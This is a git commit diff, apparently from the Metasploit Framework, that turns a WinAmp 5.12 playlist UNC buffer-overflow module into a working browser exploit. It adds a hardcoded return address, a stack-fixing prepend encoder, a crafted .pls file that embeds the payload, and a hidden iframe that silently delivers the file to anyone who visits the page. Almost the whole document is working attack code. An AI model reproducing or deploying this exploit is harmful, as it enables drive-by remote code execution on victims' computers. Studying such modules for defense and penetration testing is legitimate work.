Woo, neat krad winamp exploit :)
git-svn-id: file:///home/svn/incoming/trunk@3479 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
cd06c10aba
commit
7ee4d05bec
|
@ -26,7 +26,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'process',
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -36,11 +36,19 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'ConnectionType' => '-find',
|
'ConnectionType' => '-find',
|
||||||
},
|
},
|
||||||
|
|
||||||
|
# Landing on \x5c\x5c trashes esp, restore from ecx
|
||||||
|
'PrependEncoder' => "\x87\xe1",
|
||||||
|
|
||||||
|
# Dont need them, dont want them, preserve esi
|
||||||
|
'DisableNops' => true,
|
||||||
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'WinAmp 5.12', { }],
|
# Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
|
||||||
|
[ 'WinAmp 5.12', { 'Ret' => 0x0d45fece }],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jan 29 2006',
|
'DisclosureDate' => 'Jan 29 2006',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
@ -54,10 +62,12 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
if (not request.uri.match(/\.pls$/i))
|
if (not request.uri.match(/\.pls$/i))
|
||||||
html =
|
html =
|
||||||
"<html><iframe src='" + get_resource + '/' +
|
"<html><body>"+
|
||||||
|
"<iframe style='position:absolute;visibility:hidden;' " +
|
||||||
|
"src='" + get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
||||||
".pls'></iframe>" +
|
".pls'></iframe>" +
|
||||||
"<body>One second please...</body></html>"
|
"One second please...</body></html>"
|
||||||
send_response(cli, html)
|
send_response(cli, html)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -73,11 +83,15 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_playlist(payload)
|
def generate_playlist(payload)
|
||||||
|
|
||||||
file = Rex::Text.pattern_create(2048)
|
name = "The Metasploit(TM) Theme Song"
|
||||||
|
file = Rex::Text.rand_text_english(1026)
|
||||||
|
file[1022 , 4] = [target.ret].pack('V')
|
||||||
|
file[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
play =
|
play =
|
||||||
"[playlist]\r\n" +
|
"[playlist]\r\n" +
|
||||||
"File1=\\\\" + file + "\r\n" +
|
"File1=\\\\#{file}\r\n" +
|
||||||
"Title1=~BOF~\r\n" +
|
"Title1=#{name}\r\n" +
|
||||||
"Length1=FFF\r\n" +
|
"Length1=FFF\r\n" +
|
||||||
"NumberOfEntries=1\r\n" +
|
"NumberOfEntries=1\r\n" +
|
||||||
"Version=2\r\n"
|
"Version=2\r\n"
|
||||||
|
|
Loading…
Reference in New Issue